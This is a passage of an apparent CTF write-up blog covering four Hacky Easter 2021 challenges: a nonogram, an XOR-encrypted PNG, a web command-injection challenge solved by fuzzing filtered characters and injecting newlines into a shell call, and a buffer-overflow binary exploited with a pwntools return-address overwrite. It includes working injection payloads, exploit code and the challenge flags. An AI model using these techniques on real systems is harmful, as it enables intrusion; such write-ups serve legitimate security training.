=\"wp-content\/uploads\/2021\/04\/challenge13.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nNo! No... nono ..\r\n\r\nWhere's the egg???\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_13_01.png\" width=\"500px\"\/>\r\n\r\n<b>Hint<\/b>\r\n\r\n- Using a tool might be a good idea here.\r\n- There is a small glitch - if you don't get a solution, try something else.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nUsing <a href=\"http:\/\/a.teall.info\/nonogram\/\" rel=\"noopener noreferrer\" target=\"_blank\">this nice online solver<\/a> the greatest challenge was to write down the values from the image:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_13_02.png\" alt=\"Solved\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{Y3sY3sY3sgram_s0unds_a_l0t_nic3r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_14\">HE21.14 Haxxor what?<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge14.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"easy\">4 (easy)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>100<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI got this image of an Easter egg.\r\n\r\nBut what kind of encryption is this?!\r\n\r\n<span class=\"fake_link\">haxxorwhat<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThe original file is an image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nAccording to <span class=\"hl\">file<\/span> the provided file is just <span class=\"hl\">data<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ file haxxorwhat \r\nhaxxorwhat: data\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAlso with <span class=\"hl\">hexdump<\/span> we cannot yet see anything of interest:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ hexdump -C haxxorwhat\r\n00000000  e1 31 36 3f 62 78 69 2b  68 61 78 75 26 3a 37 73  |.16?bxi+haxu&:7s|\r\n00000010  68 61 7c 78 6f 72 77 21  60 62 78 78 6f 3a b0 fa  |ha|xorw!&#x60;bxxo:..|\r\n00000020  d9 61 78 78 6b 15 32 6c  29 61 78 c9 e0 79 8f 40  |.axxk.2l)ax..y.@|\r\n00000030  6d 61 78 78 4f 11 3b 73  25 61 78 02 49 72 73 a1  |maxxO.;s%ax.Irs.|\r\n00000040  ec 61 78 82 6f 72 73 a1  80 61 78 0d 5f 72 73 cb  |.ax.ors..ax._rs.|\r\n00000050  08 61 78 42 f7 72 73 36  18 fd c2 29 53 72 73 23  |.axB.rs6...)Srs#|\r\n00000060  4a 31 34 2c 2a 35 03 6d  68 61 78 7a 6d 70 77 24  |J14,*5.mhaxzmpw$|\r\n00000070  6e 69 72 73 62 62 61 32  70 7b 61 67 4d 6d 54 0a  |nirsbba2p{agMmT.|\r\n00000080  4d 4e 4b 53 59 49 73 21  68 51 44 3a 4b 34 41 0f  |MNKSYIs!hQD:K4A.|\r\n00000090  3c 5a 42 1f 28 34 0b 73  3c ef 19 1b cc 1c 03 99  |&lt;ZB.(4.s&lt;.......|\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe name of the challenge and the file contains <span class=\"hl\">xor<\/span> and the file is supposed to be an image.\r\n<\/p>\r\n\r\n<p>\r\nAssuming the image is a PNG, the header of it will be constant. Thus we can take any PNG (e.g. from challenge 10) and XOR the header with the beginning of the data of the file <span class=\"hl\">haxxorwhat<\/span>. The result of this is the XOR key used:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; ct1 = open('haxxorwhat','rb').read()\r\n&gt;&gt;&gt; ct2 = open('..\/10\/flag','rb').read()\r\n&gt;&gt;&gt; r = b''\r\n&gt;&gt;&gt; for i in range(16):\r\n...   r += bytes([ct1[i]^ct2[i]])\r\n... \r\n&gt;&gt;&gt; r\r\nb'haxxors!haxxors!'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly the XOR key is <span class=\"hl\">haxxors!<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to apply this key on the whole content of the file, which can be done using the following script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nkey = b'haxxors!'\r\n\r\nct = open('haxxorwhat', 'rb').read()\r\n\r\nr = b''\r\nfor i in range(len(ct)):\r\n  r += bytes([ct[i]^key[i%len(key)]])\r\n\r\nf = open('out','wb')\r\nf.write(r)\r\nf.close()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script will create the output file <span class=\"hl\">out<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ .\/crax0r.py                 \r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ file out       \r\nout: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis is actually the egg:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_14_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nNow we only need to scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/14]\r\n\u2514\u2500$ zbarimg out           \r\nQR-Code:he2021{r34l_x0r_h4xx0r}\r\nscanned 1 barcode symbols from 1 images in 0.08 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{r34l_x0r_h4xx0r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_15\">HE21.15 Social Checker<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge15.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSocial Checker - check if your favourite social media site is online!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2103<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nSome characters are blocked - find a workaround!\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided website can be used to check if a given social media site is online:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWithin an unmodified request the POST parameter <span class=\"hl\">url<\/span> is set to the social media site (e.g. <span class=\"hl\">twitter.com<\/span>). The result contains the name of the requested website (<span class=\"hl\">twitter.com<\/span>), its ip address and port (<span class=\"hl\">104.244.42.193:80<\/span>) as well as the status (<span class=\"hl\">open<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_02.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nLet&#8217;s start by changing the <span class=\"hl\">url<\/span> to target <span class=\"hl\">localhost<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis works. At next let&#8217;s try to add a simple command injection:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nObviously there is some kind of filter.\r\n<\/p>\r\n\r\n<p>\r\nWhen we provide an invalid port number, we can verify that <span class=\"hl\">nc<\/span> is used (which also means that an OS command is directly invoked):\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIn order to find possible characters, which are not filtered and can be used for a command injection, we can fuzz the service using <span class=\"hl\">ffuf<\/span>. The wordlist we use (<span class=\"hl\">URI-hex.txt<\/span>) contains all possible 256 bytes (URL encoded): <span class=\"hl\">%00<\/span>, <span class=\"hl\">%01<\/span>, &#8230; <span class=\"hl\">%ff<\/span>. The default response size is <span class=\"hl\">29<\/span>, so we filter these responses out:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/15]\r\n\u2514\u2500$ ffuf -w \/usr\/share\/wordlists\/SecLists\/Fuzzing\/URI-hex.txt -u http:\/\/46.101.107.117:2103\/check.php -d 'url=127.0.0.1FUZZ' -H 'Content-Type: application\/x-www-form-urlencoded; charset=UTF-8' -fs 29\r\n\r\n        \/'___\\  \/'___\\           \/'___\\       \r\n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \r\n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \r\n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \r\n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \r\n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \r\n\r\n       v1.1.0\r\n________________________________________________\r\n\r\n :: Method           : POST\r\n :: URL              : http:\/\/46.101.107.117:2103\/check.php\r\n :: Wordlist         : FUZZ: \/usr\/share\/wordlists\/SecLists\/Fuzzing\/URI-hex.txt\r\n :: Header           : Content-Type: application\/x-www-form-urlencoded; charset=UTF-8\r\n :: Data             : url=127.0.0.1FUZZ\r\n :: Follow redirects : false\r\n :: Calibration      : false\r\n :: Timeout          : 10\r\n :: Threads          : 40\r\n :: Matcher          : Response status: 200,204,301,302,307,401,403\r\n :: Filter           : Response size: 29\r\n________________________________________________\r\n\r\n%27                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%00                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%20                     [Status: 200, Size: 46, Words: 4, Lines: 1]\r\n%09                     [Status: 200, Size: 30, Words: 3, Lines: 2]\r\n%29                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%22                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%28                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%0a                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%30                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%26                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%3a                     [Status: 200, Size: 31, Words: 5, Lines: 2]\r\n%39                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%33                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%3b                     [Status: 200, Size: 46, Words: 4, Lines: 1]\r\n%35                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%37                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%32                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%34                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%38                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%31                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%36                     [Status: 200, Size: 32, Words: 3, Lines: 2]\r\n%3e                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%3c                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%60                     [Status: 200, Size: 0, Words: 1, Lines: 1]\r\n%7c                     [Status: 200, Size: 18, Words: 4, Lines: 2]\r\n%5c                     [Status: 200, Size: 31, Words: 5, Lines: 2]\r\n:: Progress: [256\/256] :: Job [1\/1] :: 51 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we have a few characters, which generated a different response.\r\n<\/p>\r\n\r\n<p>\r\nBy using <span class=\"hl\">%0a<\/span> we can see an error message from <span class=\"hl\">sh<\/span>, which complains that the command <span class=\"hl\">80<\/span> is unknown:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_06.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nObviously the injection point looks something like this (according to the <span class=\"hl\">X-Powered-By<\/span> header we are dealing with <span class=\"hl\">php<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nsystem(\"nc \".$_POST['url'].\":80\")\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThus we can run a command by adding another <span class=\"hl\">%0a<\/span> after the command, we want to execute:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_07.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\">ls<\/span> we can see that there is a file called <span class=\"hl\">flag.txt<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_08.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThough we cannot use a space:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_09.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\"><<\/span> to redirect the contents of <span class=\"hl\">flag.txt<\/span> to <span class=\"hl\">cat<\/span> is sufficient:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_15_10.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{1ts_fun_t0_1nj3kt_k0mmand5}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_16\">HE21.16 LOTL<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge16.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">5 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSave the planet!\r\n\r\nWell, we should then better LOTL and use what we have, right?\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2102<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">lotl<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a 64-bit ELF binary, which is dynamically linked, not stripped, without stack canaries, nx enabled, no pic and partial relro:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ file lotl  \r\nlotl: <span class=\"hl2\">ELF 64-bit<\/span> LSB executable, x86-64, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=05ea252a13b095c8275884ab0350d0f6848f4e9c, <span class=\"hl2\">not stripped<\/span>\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ r2 -A lotl       \r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x00400670]&gt; iI\r\narch     x86\r\nbaddr    0x400000\r\nbinsz    6985\r\nbintype  elf\r\nbits     64\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF64\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib64\/ld-linux-x86-64.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  true\r\nlsyms    true\r\nmachine  AMD x86-64 architecture\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   true\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped false\r\nsubsys   linux\r\nva       true\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can also see that there is a function called <span class=\"hl\">profit<\/span>, which spawns a shell:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; afl\r\n0x00400670    1 42           entry0\r\n0x004006b0    4 42   -&gt; 37   sym.deregister_tm_clones\r\n0x004006e0    4 58   -&gt; 55   sym.register_tm_clones\r\n0x00400720    3 34   -&gt; 29   entry.fini0\r\n0x00400750    1 7            entry.init0\r\n0x004008f0    1 2            sym.__libc_csu_fini\r\n0x00400757    1 97           sym.ignore_me_init_buffering\r\n0x00400660    1 6            sym.imp.setvbuf\r\n<span class=\"hl2\">0x0040086d    1 19           sym.profit<\/span>\r\n0x00400610    1 6            sym.imp.system\r\n0x004008f4    1 9            sym._fini\r\n0x004007b8    3 47           sym.kill_on_timeout\r\n0x00400620    1 6            sym.imp.printf\r\n0x00400600    1 6            sym.imp._exit\r\n0x00400880    4 101          sym.__libc_csu_init\r\n0x004006a0    1 2            sym._dl_relocate_static_pie\r\n0x00400809    1 100          main\r\n0x004007e7    1 34           sym.ignore_me_init_signal\r\n0x00400640    1 6            sym.imp.signal\r\n0x00400630    1 6            sym.imp.alarm\r\n0x00400650    1 6            sym.imp.gets\r\n0x004005d8    3 23           sym._init\r\n[0x00400670]&gt; pdf @ sym.profit \r\n\u250c 19: sym.profit ();\r\n\u2502           0x0040086d      55             push rbp\r\n\u2502           0x0040086e      4889e5         mov rbp, rsp\r\n\u2502           0x00400871      488d3d000100.  <span class=\"hl2\">lea rdi, qword str.bin_sh   ; 0x400978 ; \"\/bin\/sh\"<\/span> ; const char *string\r\n\u2502           0x00400878      e893fdffff     <span class=\"hl2\">call sym.imp.system<\/span>         ; int system(const char *string)\r\n\u2502           0x0040087d      90             nop\r\n\u2502           0x0040087e      5d             pop rbp\r\n\u2514           0x0040087f      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">main<\/span> function the unsafe function <span class=\"hl\">gets<\/span> is used, to read user input:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; pdf @ sym.main\r\n            ; DATA XREF from entry0 @ 0x40068d\r\n            \u250c 100: int main (int argc, char **argv);\r\n            \u2502           ; var char **var_30h @ rbp-0x30\r\n            \u2502           ; var int64_t var_24h @ rbp-0x24\r\n            \u2502           ; var char *s @ rbp-0x20\r\n            \u2502           ; arg int argc @ rdi\r\n            \u2502           ; arg char **argv @ rsi\r\n            \u2502           0x00400809      55             push rbp\r\n            \u2502           0x0040080a      4889e5         mov rbp, rsp\r\n            \u2502           0x0040080d      4883ec30       sub rsp, 0x30\r\n            \u2502           0x00400811      897ddc         mov dword [var_24h], edi    ; argc\r\n            \u2502           0x00400814      488975d0       mov qword [var_30h], rsi    ; argv\r\n            \u2502           0x00400818      b800000000     mov eax, 0\r\n            \u2502           0x0040081d      e835ffffff     call sym.ignore_me_init_buffering\r\n            \u2502           0x00400822      b800000000     mov eax, 0\r\n            \u2502           0x00400827      e8bbffffff     call sym.ignore_me_init_signal\r\n            \u2502           0x0040082c      488d3d050100.  lea rdi, qword str.Welcome__Please_give_me_your_name ; 0x400938 ; \"Welcome! Please give me your name!\\n&gt; \" ; const char *format\r\n            \u2502           0x00400833      b800000000     mov eax, 0\r\n            \u2502           0x00400838      e8e3fdffff     call sym.imp.printf         ; int printf(const char *format)\r\n            \u2502           0x0040083d      488d45e0       lea rax, qword [s]\r\n            \u2502           0x00400841      4889c7         mov rdi, rax                ; char *s\r\n            \u2502           0x00400844      b800000000     mov eax, 0\r\n            \u2502           0x00400849      e802feffff     <span class=\"hl2\">call sym.imp.gets<\/span>           ; char *gets(char *s)\r\n            \u2502           0x0040084e      488d45e0       lea rax, qword [s]\r\n            \u2502           0x00400852      4889c6         mov rsi, rax\r\n            \u2502           0x00400855      488d3d020100.  lea rdi, qword str.Hi__s__nice_to_meet_you ; 0x40095e ; \"Hi %s, nice to meet you!\\n\" ; const char *format\r\n            \u2502           0x0040085c      b800000000     mov eax, 0\r\n            \u2502           0x00400861      e8bafdffff     call sym.imp.printf         ; int printf(const char *format)\r\n            \u2502           0x00400866      b800000000     mov eax, 0\r\n            \u2502           0x0040086b      c9             leave\r\n            \u2514           0x0040086c      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nSince <span class=\"hl\">gets<\/span> does not do any boundary checks and there are no canaries, this can be used to simply overwrite the return address on the stack in order to control the instruction pointer.\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s determine the offset from the beginning of the buffer to the return address. We can for example use <span class=\"hl\">gdb-peda<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ gdb .\/lotl     \r\nReading symbols from .\/lotl...\r\n(No debugging symbols found in .\/lotl)\r\ngdb-peda$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing the <span class=\"hl\">pattern_create<\/span> command, we can generate a pattern of 200 bytes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ pattern_create 200 \/tmp\/pattern\r\nWriting pattern of 200 chars to filename \"\/tmp\/pattern\"\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we run the program with the pattern:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ <span class=\"hl2\">r < \/tmp\/pattern<\/span>\r\nStarting program: \/home\/kali\/ctf\/he21\/16\/lotl &lt; \/tmp\/pattern\r\nWelcome! Please give me your name!\r\n&gt; Hi AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcA..., nice to meet you!\r\n\r\nProgram received signal <span class=\"hl2\">SIGSEGV, Segmentation fault<\/span>.\r\n[----------------------------------registers-----------------------------------]\r\nRAX: 0x0 \r\nRBX: 0x0 \r\nRCX: 0x0 \r\nRDX: 0x0 \r\nRSI: 0x7fffffffb920 (\"Hi AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAA\"...)\r\nRDI: 0x7ffff7faf670 --&gt; 0x0 \r\nRBP: 0x6141414541412941 ('A)AAEAAa')\r\nRSP: 0x7fffffffdfd8 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJ...\")\r\nRIP: 0x40086c (&lt;main+99&gt;:       ret)\r\nR8 : 0xffffffff \r\nR9 : 0xdf \r\nR10: 0x7fffffffdfb0 (\"AAA%AAsAABAA$AAnAACA...\")\r\nR11: 0x246 \r\nR12: 0x400670 (&lt;_start&gt;:        xor    ebp,ebp)\r\nR13: 0x0 \r\nR14: 0x0 \r\nR15: 0x0\r\nEFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n   0x400861 &lt;main+88&gt;:  call   0x400620 &lt;printf@plt&gt;\r\n   0x400866 &lt;main+93&gt;:  mov    eax,0x0\r\n   0x40086b &lt;main+98&gt;:  leave  \r\n<span class=\"hl2\">=> 0x40086c <main+99>:  ret<\/span>    \r\n   0x40086d &lt;profit&gt;:   push   rbp\r\n   0x40086e &lt;profit+1&gt;: mov    rbp,rsp\r\n   0x400871 &lt;profit+4&gt;: lea    rdi,[rip+0x100]        # 0x400978\r\n   0x400878 &lt;profit+11&gt;:        call   0x400610 &lt;system@plt&gt;\r\n[------------------------------------stack-------------------------------------]\r\n<span class=\"hl2\">0000| 0x7fffffffdfd8 (\"AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAI...\")<\/span>\r\n0008| 0x7fffffffdfe0 (\"bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AA...\")\r\n0016| 0x7fffffffdfe8 (\"AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5A...\")\r\n0024| 0x7fffffffdff0 (\"AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6...\")\r\n0032| 0x7fffffffdff8 (\"IAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA...\")\r\n0040| 0x7fffffffe000 (\"AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiA...\")\r\n0048| 0x7fffffffe008 (\"AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAj...\")\r\n0056| 0x7fffffffe010 (\"6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAA...\")\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\nStopped reason: SIGSEGV\r\n0x000000000040086c in main ()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe program received a segmentation fault, because the return address was overwritten. The top value on the stack can be used to determine the offset from the beginning of the pattern:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ngdb-peda$ pattern_offset \"AA0AAFAAbAA1A\"\r\nAA0AAFAAbAA1A found at offset: 40\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe offset is <span class=\"hl\">40<\/span>. Accordingly the exploit to overwrite the return address with the address of <span class=\"hl\">profit<\/span> looks like this:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nprofit = 0x0040086d\r\n\r\nio = process('.\/lotl')\r\n\r\nexpl = b'A'*offset\r\nexpl += p64(profit)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the exploit locally works fine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Starting local process '.\/lotl': pid 12373\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@, nice to meet you!\r\n$ id\r\nuid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),118(bluetooth),133(scanner),142(kaboxer)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough, when changing it to target the remote service&#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nio = remote('46.101.107.117', 2102)\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; it does not work:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/16]\r\n\u2514\u2500$ .\/expl.py  \r\n[+] Opening connection to 46.101.107.117 on port 2102: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@, nice to meet you!\r\n$ \r\n[*] 